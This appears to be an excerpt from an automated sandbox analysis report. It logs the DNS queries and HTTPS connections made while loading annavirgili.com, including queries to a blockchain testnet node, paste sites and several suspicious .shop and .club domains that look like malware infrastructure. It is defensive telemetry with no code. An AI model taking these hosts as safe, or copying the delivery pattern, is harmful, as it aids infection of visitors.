      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: annavirgili.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: annavirgili.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: data-seed-prebsc-1-s1.bnbchain.org
      Source: global trafficDNS traffic detected: DNS query: _8545._https.data-seed-prebsc-1-s1.bnbchain.org
      Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
      Source: global trafficDNS traffic detected: DNS query: static.hotjar.com
      Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
      Source: global trafficDNS traffic detected: DNS query: mc.yandex.ru
      Source: global trafficDNS traffic detected: DNS query: mc.yandex.com
      Source: global trafficDNS traffic detected: DNS query: script.hotjar.com
      Source: global trafficDNS traffic detected: DNS query: vc.hotjar.io
      Source: global trafficDNS traffic detected: DNS query: ws.hotjar.com
      Source: global trafficDNS traffic detected: DNS query: content.hotjar.io
      Source: global trafficDNS traffic detected: DNS query: www.facebook.com
      Source: global trafficDNS traffic detected: DNS query: s.w.org
      Source: global trafficDNS traffic detected: DNS query: yxyz.zyxy.org
      Source: global trafficDNS traffic detected: DNS query: rebekkaworm.snuggleam.org
      Source: global trafficDNS traffic detected: DNS query: nopaste.net
      Source: global trafficDNS traffic detected: DNS query: windows.msn.com
      Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
      Source: global trafficDNS traffic detected: DNS query: jonagye.shop
      Source: global trafficDNS traffic detected: DNS query: pastebin.com
      Source: global trafficDNS traffic detected: DNS query: silversky.club
      Source: global trafficDNS traffic detected: DNS query: klipcatepiu0.shop
      Source: global trafficDNS traffic detected: DNS query: klipxevojie.shop
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
